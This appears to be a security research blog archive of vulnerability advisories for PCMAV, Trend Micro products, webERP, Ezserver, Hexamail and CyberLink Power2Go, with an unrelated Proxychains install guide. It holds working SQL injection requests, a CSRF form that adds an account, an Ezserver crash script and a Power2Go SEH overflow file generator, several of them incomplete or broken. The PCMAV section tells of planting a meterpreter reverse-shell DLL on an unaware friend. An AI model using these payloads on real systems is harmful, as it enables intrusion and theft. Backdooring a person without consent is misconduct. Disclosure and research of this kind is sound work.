PC Media Antivirus Insecure Library Loading Vulnerability

PC Media Antivirus (PCMAV) is an antivirus made by the well-known Indonesian computer magazine PC Media. PCMAV became quite popular in 2006, when many virus writers in Indonesia were actively spreading viruses that infected a large share of the computers in the country. Around that time several people began to offer specialised antivirus products for detecting Indonesian viruses, the most popular being SmadAV, PC Media Antivirus (PCMAV), and AnsAV (edit: can’t find any official links).

To this day, PCMAV is still a popular antivirus on many computers in Indonesia. It is usually installed alongside another popular free antivirus such as Avast, AVG, or Avira AntiVir. In some companies, PCMAV is also the mainstay for detecting viruses made in Indonesia.

An antivirus is endpoint protection that detects malicious programs coming from outside the computer, so it should be built with good protection and a well-designed flow, and it should not itself be vulnerable and exploitable.

Proofs of concept against antivirus products have been researched for a few years now. Some well-known antivirus products could not survive and suffered exploitation, which passes the risk on to their users.

This time, Spentera brought PCMAV into our garage to be tested. As a result, PCMAV suffers from an Insecure Library Loading vulnerability, also known as DLL Hijacking. It works like the common DLL Hijacking technique: an attacker can “introduce” his or her own DLL and have it loaded by the vulnerable software. In this case it becomes more interesting, because PCMAV is portable: users can run it without an installation, which of course is meant to make things easier for them.

This makes the DLL Hijacking vulnerability in PCMAV more dangerous: once the attacker “introduces” his or her .dll, PCMAV loads it automatically without any confirmation. So hey, what is the problem?! I can’t get it. Well, let’s say you create your own DLL that executes a backdoor, listening on a port with a command prompt to serve you later. Very dangerous, isn’t it?!

To make this clearer, let us see how DLL Hijacking works on PCMAV.

We can download the latest PCMAV from their website (at the time of writing this link works and points to the current version): http://virusindonesia.com/2012/11/23/pc-media-112012-pcmav-8-4-raptor/. If we analyse it with Process Monitor, PCMAV loads several DLLs, but one of them is interesting.

svrapi.dll is loaded by PCMAV itself. svrapi.dll is the Microsoft Common Server API Library, a system library that the program needs in order to work properly. Because PCMAV resolves it from its own directory, we can also introduce our own (malicious) svrapi.dll.
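To turn the Process Monitor observation into a defensive check, here is an added example (not from the original post) that audits a Process Monitor CSV export for two conditions: a DLL with a system-library name being mapped from outside the Windows system directories (a planted DLL), and a failed lookup of a .dll in the application directory (a hijackable search order). The CSV rows are constructed, and the DLL list and paths are assumptions.

```python
import csv
import io
import ntpath

# DLL names that should only ever be loaded from the Windows system directories.
# svrapi.dll is the one PCMAV resolves from its own folder; the others are assumed extras.
SYSTEM_DLLS = {"svrapi.dll", "kernel32.dll", "user32.dll", "advapi32.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed rows in Process Monitor's CSV export layout (not a real capture).
# Rows 1-3 model a clean run; row 4 models a run with a planted svrapi.dll.
SAMPLE_CSV = r"""Time of Day,Process Name,PID,Operation,Path,Result,Detail
1:02:03.1,PCMAV.EXE,1234,Load Image,C:\Windows\System32\kernel32.dll,SUCCESS,Image Base: 0x76d00000
1:02:03.2,PCMAV.EXE,1234,CreateFile,C:\Users\tom\PCMAV\svrapi.dll,NAME NOT FOUND,Desired Access: Read Attributes
1:02:03.3,PCMAV.EXE,1234,Load Image,C:\Windows\System32\svrapi.dll,SUCCESS,Image Base: 0x74a00000
1:02:09.0,PCMAV.EXE,1301,Load Image,C:\Users\tom\PCMAV\svrapi.dll,SUCCESS,Image Base: 0x10000000
"""

def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)

def audit_procmon_csv(text):
    """Scan a Process Monitor CSV export and return (verdict, process, path) tuples.

    PLANTED:    a DLL with a system-library name was mapped from outside the
                system directories, i.e. a hijack actually happened.
    HIJACKABLE: the loader probed the application directory for a DLL that was
                not there, so a file with that name next to the executable
                would be picked up on the next run.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        path = row["Path"]
        name = ntpath.basename(path).lower()
        if not name.endswith(".dll"):
            continue
        if row["Operation"] == "Load Image" and name in SYSTEM_DLLS and not in_system_dir(path):
            findings.append(("PLANTED", row["Process Name"], path))
        elif (row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND"
              and not in_system_dir(path)):
            findings.append(("HIJACKABLE", row["Process Name"], path))
    return findings

if __name__ == "__main__":
    for verdict, proc, path in audit_procmon_csv(SAMPLE_CSV):
        print("%-10s %s -> %s" % (verdict, proc, path))
```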

Metasploit can generate a malicious DLL; here is the way to create a DLL that spawns a reverse shell to our machine.

Once created, we simply put the malicious svrapi.dll into PCMAV’s root directory, the same path as the executable (PCMAV.EXE). With the preparation complete, we set up our meterpreter listener on our machine.

Our friend Tom was asking for a good antivirus to detect Ramnit. We put Tom to the test: we gave him our modified PCMAV, with our DLL introduced in the root directory. Once the package was delivered to our good friend Tom, he should have been happy, because he would get his computer cleaned with PCMAV. Unfortunately we changed the story: Tom executed PCMAV.EXE, our svrapi.dll was soon loaded, and not long after, our meterpreter handler received a connection.

We got our shell and Tom is happy because PCMAV is still scanning his system properly.

Moral of the story: DO NOT trust any file that comes from external removable media, even from a trusted friend. Download it from the original source (if any).

Note: Tom still doesn’t know about this.. psst..

Trend Micro Control Manager SQL Injection Vulnerability

Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese versions) and version 6 build 1449 (English version only) is susceptible to SQL injection. The application does not properly filter user-supplied input. Successful exploitation could allow arbitrary SQL commands to reach the back-end database, for instance SQL commands that upload and execute arbitrary code on the target system.

The vulnerable parameter is the ‘id’ parameter in the GET request to the AdHocQuery_Processor.aspx page. According to the Trend Micro Control Manager help page, an Ad Hoc Query is a direct request to the Control Manager database for information. The query uses data views to narrow the request and improve performance. After specifying the data view, users can further narrow their search by specifying filtering criteria for the request.

Version Affected

Trend Micro Control Manager 5.5 prior to (English and Japanese version)
Trend Micro Control Manager 6 prior to (English version)


An attacker with access to the Trend Micro Control Manager web interface can conduct a SQL injection attack, which could result in information leakage, arbitrary code execution and/or denial of service.


The vendor has stated that these vulnerabilities have been addressed in Trend Micro Control Manager version 5.5 and 6.0 critical patches.

Critical patch available for SQL injection attacks in Control Manager (TMCM)

Control Manager 6 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4202#fragment-4248

Control Manager 5.5 – Product Patch
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=1763#fragment-1845

Trend Micro Control Manager 5.5 – Patch (Japanese only)
http://downloadcenter.trendmicro.com/index.php?regs=jp&clk=tbl&clkval=3432#fragment-3462

Proof of Concept



JVN#42014489 – http://jvn.jp/en/jp/JVN42014489/index.html
VU#950795 – http://www.kb.cert.org/vuls/id/950795


webERP <=4.08.4 SQL Injection Vulnerability


webERP is a mature open-source ERP system providing best-practice, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter of the file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an SQL query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&WO=33' AND SLEEP(5) AND '1'='1&StockLocation=MEL&StartDate=14/09/2012&RequiredBy=14/09/2012&NumberOfOutputs=0&submit=&StockCat=All&Keywords=&StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207



Upgrade to the latest version here: http://sourceforge.net/projects/web-erp/


Trend Micro InterScan Messaging Security Suite Multiple Vulnerabilities

Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.

Proof of Concept

The PoCs for the vulnerabilities are as follows:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS
Non-persistent/Reflected XSS
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
<form action="hxxps://" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>


Currently, we are not aware of any vendor solution. You may contact the vendor for a patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized users from making use of this vulnerability.




Proxychains on OSX Mountain Lion


The link below is not working anymore. To install Proxychains, you can install it directly using brew:

infidel:~ goo$ brew install proxychains-ng

Here is the step-by-step solution to get it working:

Set up a working directory; I’m using ~/build-temp/

infidel:~ goo$ mkdir build-temp
infidel:~ goo$ cd build-temp

Download Proxychains from here (you may use wget or the browser) and extract it

infidel:build-temp goo$ tar xzvf proxychains-3.1.tar.gz

Download the patch file for Proxychains here (thanks to the chrootlabs guy)

infidel:build-temp goo$ wget http://chrootlabs.org/bgt/proxychains-3.1_osx.diff

Patch Proxychains

infidel:build-temp goo$ patch -p1 <proxychains-3.1_osx.diff

Install Proxychains

infidel:build-temp goo$ cd proxychains-3.1
infidel:proxychains-3.1 goo$ ./configure --PREFIX=/opt/local
infidel:proxychains-3.1 goo$ cd proxychains
infidel:proxychains goo$ make
infidel:proxychains goo$ sudo make install

Create symbolic links to make it run from anywhere

infidel:proxychains goo$ mkdir ~/.libs
infidel:proxychains goo$ mkdir ~/.proxychains
infidel:proxychains goo$ ln -s /opt/local/lib/libproxychains.3.0.0.dylib ~/.libs/
infidel:proxychains goo$ ln -s /opt/local/etc/proxychains.conf ~/.proxychains/

Now comment out the proxy_dns option in the proxychains.conf file (it causes trouble)

infidel:proxychains goo$ sudo nano ~/.proxychains/proxychains.conf

Proxychains should work now; you may test it using lynx

infidel:~ goo$ proxychains lynx ipchicken.com

source: http://touhou.ru/?act=showpost&pid=511

Ezhometech Ezserver <=6.4.017 Stack Buffer Overflow Vulnerability

EZserver version 6.4.017 or below contains a buffer overflow vulnerability which may possibly be exploited to cause a denial of service or arbitrary code execution.

Vulnerability Details

A buffer overflow condition exists in URL handling: sending a long GET request to the server on port 8000 causes the server process to exit and may allow malicious code injection. Further research found that the application does not care about the HTTP method, so sending a long string of characters to port 8000 is enough to crash the program.

Vendor logs

06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.

Proof of Concept


from socket import *
import sys

if len(sys.argv) != 3:
    print "[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow"
    print "[*] by Spentera Research - research[at]spentera[dot]com"
    print "[*] http://www.spentera.com/resources/security-advisory\n"
    print "[*] Usage: python %s ip port" % sys.argv[0]
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

junk = "\x41" * 10000   # 10000 'A' bytes, long enough to overrun the URL buffer
payload = junk

print "[!] Connecting to %s on port %d" % (host, port)
s = socket(AF_INET, SOCK_STREAM)

try:
    s.connect((host, port))
    print "[+] Launching attack.."
    s.send("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")
    s.close()
except error:
    print "[x] Could not connect to the server x_x"

Working Exploit



Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

Hexamail Server <= 4.4.5 Persistent XSS Vulnerability

Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email.

Vulnerability Description

Hexamail Server suffers from a persistent XSS vulnerability in the mail body, allowing a malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and/or hijack the user’s browser.

Proof of Concept

By sending a malicious script to the victim’s email address, the webmail automatically loads the mail body, so the script is executed without any permission from the user.

root@bt:~/# cat > meal.txt
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com -xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

Vendor timeline

04/20/2012 – Issue discovered
04/20/2012 – Vendor contacted
04/27/2012 – Vendor responded and provided a new upgrade version
04/30/2012 – Issue still present in the latest upgrade version
04/30/2012 – Vendor said they are still fixing the problem
05/10/2012 – Email sent to ask about the fix progress
06/02/2012 – No response. Sent to Secunia.


Not available.

CyberLink Power2Go Unicode Stack Buffer Overflow

The proof of concept of the vulnerability was released on December 9, 2011, and there has been no further announcement from CyberLink. I tried to coordinate the issue until they didn’t contact me anymore. A week after our last email, they updated the product, and yes, it’s Power2Go 8. How do they know that the product is safe without letting me check again?

The application itself is still vulnerable to a stack buffer overflow, as we posted earlier here. This morning, a good friend from Metasploit, mr_me, sent me an email asking why I didn’t get a shell from this PoC. He also attached his working exploit script, which works flawlessly on Windows 7. Awesome!

I told him that I had already managed to get a shell on Power2Go 7 (build 196), but couldn’t find any reliable jump address on Power2Go 8, because it’s a unicode stack overflow and obviously you face a very limited choice of JMP or RET addresses. He submitted his working exploit to the Metasploit exploit dev team, so it will be added to Metasploit soon.

So, here is the PoC for Power2Go 7 (build 196):


# badchars: all above "\x7F" will be converted to "\xFF",
# even the "\xFF" itself is marked as badchar.
import time
filename = "overflow-power2go-7.p2g"

header = (

body = (

unicode_nop = "\x6f"

junk = "A" * 778
nseh = "\x61\x6f"
#seh = "\x3e\x42"	# 0x0042003e : pop esi # pop ecx # ret 08 # Power2Go.exe
seh = "\x39\x20\x50"	# 0x00450165 : pop edi # pop esi # ret # Power2Go.exe

alignment = "\x54"  # PUSH ESP
alignment += unicode_nop
alignment += "\x58"  # POP EAX
alignment += unicode_nop
alignment += "\x05\x12\x11"  # ADD EAX,11001200
alignment += unicode_nop
alignment += "\x2d\x01\x01"  # SUB EAX,1000100
alignment += unicode_nop
alignment += "\x2d\x01\x10"  # SUB EAX,10000100
alignment += unicode_nop

# space is not an issue, we have a lot of space.
walk = "\x73" * 728    # we just walk until we meet the shellcode


sisa =  "\x42" * (8000 - len(junk+nseh+seh+alignment+walk+sc))

hell = "\x3c\x46\x69\x6c\x65" + "\r\n"	# <File
hell+= "name=" + '"'+ junk+nseh+seh+alignment+walk+sc+sisa + '"'

print "CyberLink Power2Go <= File Project Processing (.p2g) Buffer Overflow (0day)"
print "[*] by modpr0be "
print "[*] Preparing the file.."
try:
	f = open(filename,'w')
	f.write(header+ "\r\n" + hell + "\r\n" + body)
	print "[+] File", filename, "successfully created!"
	print "[*] Please open", filename, "with CyberLink Power2Go."
	print "[*] After that, telnet to target on port 4444."
except IOError:
	print "[-] Could not write to destination folder, check permission.."
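The comments next to the alignment stub in the PoC above claim that, once the application widens the file name to UTF-16, the bytes decode to PUSH ESP / POP EAX / ADD EAX,11001200 / SUB EAX,1000100 / SUB EAX,10000100. The following is an added example (not part of the PoC and not CyberLink code) that models that widening and decodes the result, showing why a 0x6f follows every instruction and that the net effect is EAX = ESP + 0x1000; modelling the conversion as plain latin-1 to UTF-16LE is an assumption.

```python
import struct

# The alignment stub from the Power2Go 7 PoC above, as it sits in the .p2g file
# (one byte per character, before Windows widens it to UTF-16).
UNICODE_NOP = b"\x6f"
STUB = (b"\x54" + UNICODE_NOP             # push esp
        + b"\x58" + UNICODE_NOP           # pop eax
        + b"\x05\x12\x11" + UNICODE_NOP   # add eax, imm32
        + b"\x2d\x01\x01" + UNICODE_NOP   # sub eax, imm32
        + b"\x2d\x01\x10" + UNICODE_NOP)  # sub eax, imm32

def unicode_expand(raw):
    """Model the ANSI -> UTF-16LE conversion applied to the file name: every
    byte <= 0x7f lands in memory followed by a 0x00. Bytes above 0x7f are
    rejected here because, as the PoC notes, they collapse to 0xff."""
    if any(b > 0x7f for b in raw):
        raise ValueError("byte above 0x7f would not survive the conversion")
    return raw.decode("latin-1").encode("utf-16-le")

def decode_stub(code):
    """Decode the few opcodes the stub uses after expansion. Returns a listing
    and the net change applied to EAX (which starts as a copy of ESP)."""
    listing, delta, i = [], 0, 0
    while i < len(code):
        op = code[i]
        if op == 0x54:
            listing.append("push esp"); i += 1
        elif op == 0x58:
            listing.append("pop eax"); i += 1
        elif op in (0x05, 0x2d):  # add/sub eax, imm32: the inserted 0x00s become immediate bytes
            imm = struct.unpack_from("<I", code, i + 1)[0]
            listing.append("%s eax, 0x%08x" % ("add" if op == 0x05 else "sub", imm))
            delta += imm if op == 0x05 else -imm
            i += 5
        elif code[i:i + 3] == b"\x00\x6f\x00":
            # 00 6f 00 = add byte ptr [edi], ch: the "venetian" nop that absorbs
            # the stray 0x00; harmless only while EDI points at writable memory.
            listing.append("add [edi], ch"); i += 3
        else:
            raise ValueError("unexpected byte 0x%02x at offset %d" % (op, i))
    return listing, delta & 0xffffffff

if __name__ == "__main__":
    listing, delta = decode_stub(unicode_expand(STUB))
    print("\n".join(listing))
    print("eax = esp + 0x%x" % delta)
```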

Looking for the Power2Go 8 exploit? Wait until mr_me's pull request is accepted by the Metasploit team; it will then be pushed to your Metasploit automatically 🙂
We don't have any information on whether the vulnerability is being exploited.